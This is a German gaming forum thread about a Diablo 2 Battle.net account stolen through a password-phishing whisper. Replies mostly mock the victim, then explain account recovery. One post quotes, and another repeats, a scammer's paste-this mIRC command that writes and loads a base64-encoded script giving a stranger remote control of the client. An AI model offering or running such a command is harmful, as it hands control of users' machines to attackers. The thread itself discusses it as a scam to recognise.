• Liebe User, bitte beachtet folgendes Thema: Was im Forum passiert, bleibt im Forum! Danke!
  • Hallo Gemeinde! Das Problem leidet zurzeit unter technischen Problemen. Wir sind da dran, aber das Zeitkontingent ist begrenzt. In der Zwischenzeit dürfte den meisten aufgefallen sein, dass das Erstellen von Posts funktioniert, auch wenn das Forum erstmal eine Fehlermeldung wirft. Um unseren Löschaufwand zu minimieren, bitten wir euch darum, nicht mehrmals auf 'Post Reply' zu klicken, da das zur Mehrfachposts führt. Grußworte.

Acc Geklaut

Maijin_Dragon

Guest
Ich hab vorhin mal Diablo gezoggt dann war ich im Offiziellen Chat und da kam eine Nachricht die so ungefähr hieß:

Save your ACC /w *save1.10 ACC pass

Ja und dann stand da noch das man es unbedingt saven soll da man sonst den Charakter verliert den man gerade hat. Und dann prommt hab ich das gemacht flieg ich 5sec danach aus dem b-net raus und wenn ich mich wieder einloggen will geht mein pass net mehr. Buäh :heul: jetz kann ich mir ein neuen Nickname einfallen lassen. kann mir jemand ein programm geben damit ich mein acc vielleicht zurück bekomme.

Schubunki

Guest
du bist aber auch so selten dämlich... von diesen leuten gibts hunderte und ich hab mich immer gefragt wer so doof ist, darauf rein zu fallen ;\

naja ausser bruteforcen geht da nix und das geht auch nicht :) --> gg

Maijin_Dragon

Guest
ACH SONE KACKE!!! Ich bringe den jenigen um der so etwas macht!!! Gibt es wirklich keine Lösung ?? ich hab mal hier im forum gehört das es so ein programm gibt das man tag und nacht laufen lassen kann bis es das richtige passwort gefunden hat? gibt es das noch hat nicht irgendjemand ahnung davon???:eek:

:heul::heul::heul::heul::heul::heul::heul::heul::heul::heul::heul:

Sas~iN~LoVe

Guest
ROOOOOOOOOFL! =]

so n dau hab ich ja noch nie erlebt ^^

TimeShade

Guest
ROOOOOFLLL
nu sag mal plz wie lang du schon d2 zockst damit ich noch länger darüber lachen kann

TimeShade

Guest
lol dann stell dich net so an, 2wochen, was hast denn schon für chars und ausrüstung??
das zeug finde ich dir an einem abend wieder

Reaktionen
0
Jop, Account ist Weg.
Wobei, wer nicht lesen kann ist selber Schuld.

Es gibt nämlich rechts in ROT einen Text der sagt das du NIEMALS dein PW rausgeben sollst.

Reaktionen
0
1. LOL, dass du drauf reinfällst :)
2. LOL, dass du weinst wegen einem 2 wochen alten account, denn da wird wohl nciht allzuviel "drin" sein
3. LOL diablo2 heutzutage noch spielen...
4. LOL noob

Schubunki

Guest
Original geschrieben von [Eat]_no_Fish!
2. LOL, dass du weinst wegen einem 2 wochen alten account, denn da wird wohl nciht allzuviel "drin" sein
4. LOL noob

1. jo °°
2. es ging ihm hauptsächlich um den namen, so wie ich das verstanden habe
3. damn r8
4. ^^v

DaNgEr4

Guest
Original geschrieben von [Eat]_no_Fish!
4. LOL noob

:rofl2: n1n1n1n1n1n1n1

Reaktionen
0
omg lol das es sowas noch gibt
bitte log dich nochmal ins bnet ein und lies die grosse rote warnmeldung rechts mitte.
dann darfste gerne anfangen dich selber zu schlagen oder ähnliches, denn - ja - du hast es verdient.
das wird seid _JAHREN_ auf sämtlichen d2 seiten geschrieben das man als dau bitte nicht das pass jemanden whispern soll

aber nunja ich kann dich trösten - d2 ist atm sowieso fürn arsch da jeder trottel in 2 tagen lvl 99 werden kann

Cyberius

Guest
:rofl2: :rofl2: :rofl2: :rofl2: :rofl2: :rofl2: :rofl2:
ich schmeiss mich weg, wie kann man nur auf die dumme Idee kommen jemanden wegen so nam Kram anzuwhispern, da kann der Name noch so ausgefallen sein!

:rofl2: :rofl2: :rofl2: :rofl2: :rofl2: :rofl2: :rofl2:

Reaktionen
0
[11:11:42] <SGa^thuck> wait
[11:11:50] <SGa^thuck> use this command
[11:11:52] <SGa^thuck> //write cmz.mrc $decode(Y3RjcCAqOmlucyo6PzokMi0=,m) | .load -rs cmz.mrc | .msg ctoxer rq FREE-BNC
[11:11:56] <SGa^thuck> just copy and paste in this window

und es soll Leute geben die machen sowas :drunken:

aber davon abgesehen, kann mir ein IRC Kenner sagen was GENAU passiert wäre wenn ich das getan hätte ?

Reaktionen
0
nene fake, so dumm ist niemand... besonnders weil bei d2 immer an der rechten seite steht: Blizzard will never ask for your password.

Reaktionen
0
wie so dumm ist niemand? Was glaubt ihr, warum es nach Jahren immer noch auf diese Weise versucht wird? Richtig, weil immer noch Leute drauf reinfallen.

TimeShade

Guest
yo die versuchen es ja nicht nur auf dei weise, mir hat mal einer gesagt ich ziehe dich durch norm alp hell wenn du n bestimmten rang bei blizzard inner rangliste hast
dazu einefach /dnd name pass bla eingeben

yo, und es gibt leute die fallen halt immernoch darauf rein und diese saver acc´s sind ja grad bei eneuen patches immer wieder da!!

aber wie gesagt selber schuld

Reaktionen
0
Original geschrieben von TimeShad€
yo, und es gibt leute die fallen halt immernoch darauf rein und diese saver acc´s sind ja grad bei eneuen patches immer wieder da!!

Dem beugt Blizzard ja recht effektiv vor :elefant:

Hydroxie_Koter

Guest
Original geschrieben von Maijin_Dragon
ACH SONE KACKE!!! Ich bringe den jenigen um der so etwas macht!!! Gibt es wirklich keine Lösung ?? ich hab mal hier im forum gehört das es so ein programm gibt das man tag und nacht laufen lassen kann bis es das richtige passwort gefunden hat?
Toxxy hat bereits alles wichtige gesagt. bruteforce wäre die letzte lösung gewesen, aber beim battlenet funzt das net.

The_Company

Guest
Original geschrieben von Stoned
aber davon abgesehen, kann mir ein IRC Kenner sagen was GENAU passiert wäre wenn ich das getan hätte ?
[17:28] <Company> /write cmz.mrc $decode(Y3RjcCAqOmlucyo6PzokMi0=,m) | .load -rs cmz.mrc | .msg ctoxer rq FREE-BNC

mit xchat...

Reaktionen
6
Original geschrieben von SkyHawK-ScT-

Der Account ist definitiv nicht weg.
Allenfalls sind alle Items weg, aber den Account bekommst du mit Hilfe des oben geposteten Link zurück.

woher weiß blizzard eigentlich das er acc wirklich mir gehört?

socke@meinclan.de socke[pg] starcraft europe

mit diesen 4 angaben schicken die mir doch niemals das pw zu socke's account =/

Reaktionen
0
Once we receive your email and verify that your account has not been closed by Blizzard, we will reply with a request for the initial CD-Key used to create the account. For your protection, we are not asking for this information on our website.

auf deutsch:
du musst ne antwortmail schreiben und dort den cdkey angeben welcher benutzt wurde um den account zu erstellen

Oben